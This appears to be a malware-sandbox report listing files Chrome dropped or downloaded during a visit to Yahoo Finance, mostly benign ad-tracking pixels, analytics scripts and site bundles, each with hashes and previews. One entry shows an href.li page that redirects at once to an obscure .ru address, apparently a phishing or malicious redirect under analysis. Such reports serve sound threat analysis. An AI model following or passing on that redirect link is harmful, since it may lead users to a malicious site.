                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2074), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.260719431857589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:CEUG4rNVxugJTY7rRKLNqpH7q7HwDOq7br2yOuQ6qh:CdrNV0gVWvbq7eOq72yOdh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93D5BB91C9A48C4EDBC164A65354B00C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA8D8A5F20B4061A7581135B465F7D81F431390C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E17075CF2F747253CB3C737891BE0F417B8F4330DDAB9D53013BDD4EBCA568EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3F0F5D520F75A443304ED277F73F050698029942A1A01B9B65A8F0D38846B7DFA04D126685A75436BC3534D94DD0C9B1BCCC6DB2C628C58FF74453FA92FD9D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){var n="tsdtocl",e="!-#@",t="ul",i="https:",o=atob("aHR0cHM6Ly90c2R0b2NsLmNvbQ=="),r={},a=i,d=-1,c,u;try{var s=function n(e){r[e.id]&&(r[e.id](e),delete r[e.id])},w=function e(t){var i;try{i=JSON.parse(t.data)}catch(n){}i&&i.namespace===n&&s(i)},f=function e(t,i,o,a){if(c){r[++d]=a;var u={namespace:n,id:d,action:t,key:i,value:o};return c&&c.contentWindow&&c.contentWindow.postMessage(JSON.stringify(u),"*"),u}},l=function n(e){for(var t="".concat(e,"="),i=document.cookie.split(";"),o=0;o<i.length;o++){for(var r=i[o];" "===r.charAt(0);)r=r.substring(1);if(0===r.indexOf(t))return r.substring(t.length,r.length)}return""},g=function n(e,t,i){return f("append",e,t,i)},p=function n(t){if(t&&"string"==typeof t&&-1!==t.indexOf(e)){var i=new Image;return i.src="".concat(a,"//trc.taboola.com/sg/taboola-ifs/1/um/?uils=").concat(encodeURIComponent(t)),i}},m=function n(e){if(e&&e.success){if(e.wasAppended&&e.value)return p(e.value)}else window.__trcDebug&&window.__trcDebug("ifsDebug=".conc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/v000/sync?userid=bJG6b41QRgE5&ev=1&pn_id=pp&gpp_sid=&gpp=&us_privacy=&pid=561118&gdpr_consent=&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18467)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.367069786955771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:EgTlLhxp1h7YxHVyXI90OrN3jMx1YaihRuBghHm+ghpwxy0Eh:BltP1eOXIGOrN3QxcO+Fm3hWxy0Eh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F6785B5675F597AB29221AD63A71C1AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D9C23EEE74C7A871B04A4B581A66B0EF6F1676D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:049679A615A4FD478198EEC395C0C83ECD736B72CA83CB2C4FC847D64270CDEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:773E545A314F64B66AA68745FDA20F6706E9F3AA36C5DECD5E0D284EF8E7D44901395B759A406F13871584C0489B58723A13ED27A1F163F83905708C7012127F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see finQuote-e859d40f.7868cdbbbb9347a65028.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6852],{266:(t,e,s)=>{s(5873),s(263),s(2403),s(7083),s(8762),s(6027),s(5316),s(1216),s(1145),s(4039),s(3504);var i=s(4603),n=s(9261),a=s(7816),o=s(714),r=s(1662),l=s(2438);function c(t,e){(function(t,e){if(e.has(t))throw new TypeError("Cannot initialize the same private elements twice on an object")})(t,e),e.add(t)}function h(t,e,s){if("function"==typeof t?t===e:t.has(e))return arguments.length<3?e:s;throw new TypeError("Private element is not present on this object")}const d={upgrades:"positive",downgrades:"negative"};var u=new WeakSet;class p{constructor(t,e,s){c(this,u),this.events={},this.stx=t,this.chartRange=e,this.fireEvent=s,this.showEarnings=!1,this.showEconomicEvents=!1,this.showAnalystRatings=!1,this.eventsQuoteStore=new Map,this.marketLabel="eventsQuote",this.init();const i=docume
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsugLKTM9zeqIkwBPeRbcfpuXvTD70a7dHnVOsUic0-4mdiKR-7jFWR1J6iZ1aHDj7xGB9IuECeMknypRj7NUA8osqVekBvhpkw3zq2XZfsNSW2vQmrfTHpoNF6CwsbG69MUgXnCFbnW39v8sg-pvL_vrnGvGGFlzdH8wexWbGx5lUN4j9QoNlLoGbJlOQs2OSnQAA&sig=Cg0ArKJSzDQvdKd_K_SqEAE&id=lidar2&mcvt=1015&p=24,146,274,1116&tm=6949.099999999977&tu=5933.700000000012&mtos=1015,1015,1015,1015,1015&tos=1015,0,0,0,0&v=20240925&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=19&adk=18976222&rs=4&la=1&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=v&co=2364979200&rst=1727716991478&rpt=7045&isd=0&lsd=0&met=ce&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64457), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):67717
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.404608504229257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:2UI64yjnvD+FnD6Ug0NAohpuGKOGALvCqk8B4B3OYJKnGvK:TzvDAgoqi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6EA12FCCBED15820786C87F0B9B67D61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0B1945893B1F90112CB7B1615DD751A17F0BE14F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CBEEE7DA6CC21D0D3394C55FAB07C9005D10405A505117CB41C2A1B013773B97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D06684BA7C541FA5CE2879FAE1632B1996475A3CCE1E7384F396E07010BFC336F2A9A976D07E9A1F97C2620D70B6F465F216E6EDF4243C0245C8FA51772CF072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("HomepageClient",[],t):"object"==typeof exports?exports.HomepageClient=t():e.HomepageClient=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var r=o[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var n=window.webpackJsonpHomepageClient;window.webpackJsonpHomepageClient=function(t,o,i){for(var a,s,c=0,l=[];c<t.length;c++)s=t[c],r[s]&&l.push(r[s][0]),r[s]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(e[a]=o[a]);for(n&&n(t,o,i);l.length;)l.shift()()};var o={},r={1:0,2:0};return t.e=function(e){function n(){s.onerror=s.onload=null,clearTimeout(c);var t=r[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),r[e]=void 0)}var o=r[e];if(0===o)return new Promise(function(e){e()});if(o)return o[2];var i=new Promise(function(t,n){o=r[e]=[t,n]});o[2]=i;v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.897710952331282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:7GJ+aBFDSF6DdlBsJS3vRa2W2Y93rstYQ33N0H7OWi2grTidx5+qfAluvsQD0ARf:KJ+aa8PBYS3vKbs2O3NAihHid4WH0AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0A56E9F3A8E9D3B1D6237FECFB70A0ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EF154DA3BB90900CAABECF3D86503313760B19B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4C11877054EDBF06F53B9585A5B65579F45C5FC902333D0645FE425CA5B1B3C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B3B27D03376EFC621D8EE23273EF21EDAA993F6464A853A29AAB21B75BD8A6A166356938A406DE3BA94840FD4A29D298180FC981D903BBABC387C5373D426F77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ ............acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 1999 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.......C....................................................................C.........................................................................d............................................E..........................!1A..Qa."..2q....#BR.$...3br..&5CS..Tds...................................0......................!..1..A.."#$Qa2Cq.&3.4B.............?......%.t.c.*5...S9..x).&.?de=;j..].y.W..z><.Jx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=1197812728&c7=https%3A%2F%2Ffinance.yahoo.com%2Fsectors%2Fbasic-materials%2F&c8=Basic%20Materials%20Stock%20Performance%20-%20Yahoo%20Finance&c9=&c14=-1&gdpr=0&gdpr_consent=&cs_ucfr=1&cs_fpdm=*null&cs_fpdt=*null&cs_fpid=ktb74Qf%2BB5a5JQqJGS%2Fbp0PG1iIU%2BWKGDEPE8YdWnT4%3D&cs_fpit=c&ns_c=UTF-8&ns__t=1727716915175
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):221
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.837976201033368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HAXeIN2M8IESK9EauYqeBXViqoG2M8IESKc7+SXlx6Iw6/RRglAM8IESKacRAXlJ:HF6Eqaqa5omEA77Xla6ZRGEGco
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:85550477286E3845B385885D4B4A08AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E9E16776C594DBF4C351906301E866E45B9120CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:174F02D47EB482170E5F64B892DDF2004BF050B6899835167DA50D4F090A902F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D1C464E189295D49F7459578DE3FC7E843E49E3AFC585A350DEA68A659B2038472CECB406D1CEE5EFC63D8ADF190846C1B605280EA8904555323E925BF6ADB31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectionFooter.Cj4SuLPe.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.footer.yf-1qpyi02{margin-top:var(--space-4);display:flex}.top-gap.yf-1qpyi02{margin-top:0}@media only screen and (min-width: 1050px){.footer.os.yf-1qpyi02{margin-top:0;display:none}.footer.os.yf-1qpyi02 a{display:none}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://beacon-ams3.rubiconproject.com/beacon/d/6d2a5fd0-22e8-4298-bb34-5790bff1bbf0?oo=0&accountId=17250&siteId=539018&zoneId=3323074&sizeId=15&e=6A1E40E384DA563BC820472955B018F36507B8C51C7B0D0EC1B79917B23DA9279D3537DB7BBA0F0FFB3433F8A31304740D4DB7A26C7F9E6B984C8952C959BBFF670C0F35FF6AA6AB123F4BC77F95DF3763AF685AF18256F352818FE89C133E1ADA6F8C6869A2DBB5EE0AFB166C5FCC3D109478760DFABCFE32997889F1DA11D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):478
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.185458679539729
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:hYzx7BqhCGX7PHF07ctQtqqJmrLgFA++4Nbx8oA2mX7PHKX7Pb:hYzxBqhCGh042RR+4NBA2muv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:91B95D65B075685ED4FC5DC02C9CDA11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:290DE72D4ADB44C74B4A5B404CCFD0596EAC3760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:90695C489F273578FB79EE23B8B1B104541D0196E5048D44DFAEEEF595A6E769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF7488A971EDF4B824AFC824809F6BA0826AB7023C537316B9CBA9DBE0F796B7FF4EBFA5F95A684F7C4B943C47454BBB9C1EA711412291B63EB42E2AD91690AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://href.li/?https://HFj.rontishet.ru/iCaWzj6Q/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://HFj.rontishet.ru/iCaWzj6Q/" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ */.window.location.replace( "https:\/\/HFj.rontishet.ru\/iCaWzj6Q\/" + window.location.hash );./* */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://HFj.rontishet.ru/iCaWzj6Q/">https://HFj.rontishet.ru/iCaWzj6Q/</a></p></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (24308)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24415
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.280470298246086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:UXk0S8r+1JWAbMK0iVE3et6MOmZe8CLLcSmZ4pJJo0g4kuwYL2zZxHduyS/N9Nya:8k0S8r+1JrbMK0iVEut1OmZe8YLowJT/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2469CA4BCFD4E629A62432D0B42866B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5BF16910FC91FDC0D1B6787734969C9D3558F089
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE93A82EB368176535AC8C154DDEE884802AE81596890FE256CB6A8F49016018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6DACA9E351AFE429EAC673A81122E27DB04D4B2B6A5BD2280562F1DE57B79463568A1674D8196149DC891598495C45FDFB5DD710F6ACC432CAA415C49A7B910C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 736-bundle.js.LICENSE.txt */.(self.webpackChunkregistration=self.webpackChunkregistration||[]).push([[736],{6012:(t,e,r)=>{"use strict";r.d(e,{cp:()=>Vt,U$:()=>Nt});var n=r(912);var o=r(5660),c=r(2684);function i(t){var e=this.__data__=new n.c(t);this.size=e.size}i.prototype.clear=function(){this.__data__=new n.c,this.size=0},i.prototype.delete=function(t){var e=this.__data__,r=e.delete(t);return this.size=e.size,r},i.prototype.get=function(t){return this.__data__.get(t)},i.prototype.has=function(t){return this.__data__.has(t)},i.prototype.set=function(t,e){var r=this.__data__;if(r instanceof n.c){var i=r.__data__;if(!o.c||i.length<199)return i.push([t,e]),this.size=++r.size,this;r=this.__data__=new c.c(i)}return r.set(t,e),this.size=r.size,this};const a=i;var u=r(8043);const s=function(){try{var t=(0,u.c)(Object,"defineProperty");return t({},"",{}),t}catch(t){}}(),f=function(t,e,r){"__proto__"==e&&s?s(t,e,{configurable:!0,enumerable:!0,value:r,wr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 85 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014960565232002
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlw7tn/dLWtxl/k4E08up:6v/lhPCRK7Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F869F09870417E960DED66D97A6090B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:490F1F79C51B26F8DA759C4562136E45ADAEE00E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3BC2620019E1B8A2BD5160BD5AB22C76D29EE171ECA86B602C91FCF71AC927F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5B7858D0E2515B8F6A4FB92D1DE42BE0935F37BE3A175EDA3FC665EA14FEDAA57DA3318EF1ADFE407B717683A7DE6B2907A763BDCC285EDE9521444995A3A42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cb5e237ab880f47/1727716828536/ZTYaatjzYFSdFEX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...U...D........3....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11901), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.106396238513521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:ggHWnmGW7GECHay2/WINSyAWRvrhAo1ti:ggHWnmGW7GECHaXN9AWR8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:59AE89307F6BE51355E07ACF3994F79B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A9C5474C652DBC6B60B97C6E723E03A399ACA92D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F54AFF9F498AEFB3479AF7D4F67B5ECE9465B24DB28293A1EE7F32A2230E162F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED56A2963D8ACCC7E316F10138566AA2BA715384418B106997C6525D016BE61C6B7583227DBDFC28704A71248DC8E21CC0E19E8D77D46FF84A3D143FE471FD63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-loader-2.7.21-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(a,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-loader",[],e):"object"==typeof exports?exports["wafer-loader"]=e():(a.wafer=a.wafer||{},a.wafer.wafers=a.wafer.wafers||{},a.wafer.wafers["wafer-loader"]=e())}("undefined"!=typeof self?self:this,function(){return function(a){function e(w){if(r[w])return r[w].exports;var f=r[w]={i:w,l:!1,exports:{}};return a[w].call(f.exports,f,f.exports,e),f.l=!0,f.exports}var r={};return e.m=a,e.c=r,e.d=function(a,r,w){e.o(a,r)||Object.defineProperty(a,r,{configurable:!1,enumerable:!0,get:w})},e.n=function(a){var r=a&&a.__esModule?function(){return a.default}:function(){return a};return e.d(r,"a",r),r},e.o=function(a,e){return Object.prototype.hasOwnProperty.call(a,e)},e.p="https://s.yimg.com/aaq/wf/",e(e.s="./src/entry.js")}({"../../manifest.json":function(a,e){a.exports={"wafer-account-switch":{meta:{version:"1.1.7"},modern:{min:"/aaq/wf/wf-account-switch-1.1.7-moder
